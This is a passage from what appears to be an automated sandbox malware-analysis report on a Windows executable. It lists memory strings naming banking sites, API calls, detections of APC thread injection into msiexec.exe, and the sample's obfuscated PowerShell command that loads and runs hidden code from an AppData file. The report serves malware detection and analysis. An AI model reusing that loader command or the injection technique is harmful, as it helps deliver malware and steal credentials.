            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
            Source: msiexec.exe, 00000005.00000002.2129804635.000000000628E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq'
            Source: powershell.exe, 00000002.00000002.1255613084.0000000005243000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\/r
            Source: powershell.exe, 00000002.00000002.1255613084.0000000005243000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\/r
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeAPI call chain: ExitProcess graph end nodegraph_0-3784
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeAPI call chain: ExitProcess graph end nodegraph_0-3782
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00A3D8A4 LdrInitializeThunk,2_2_00A3D8A4
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_00405E92 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E92
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Early bird code injection technique detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000Jump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_100010D3 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,DeleteFileA,GlobalAlloc,GlobalLock,GetVersionExA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,CreateProcessA,lstrcpyA,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenA,lstrlenA,lstrlenA,lstrcpynA,lstrlenA,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatA,GlobalSize,lstrlenA,lstrcpyA,CharNextA,GetTickCount,TerminateProcess,lstrcpyA,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,0_2_100010D3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
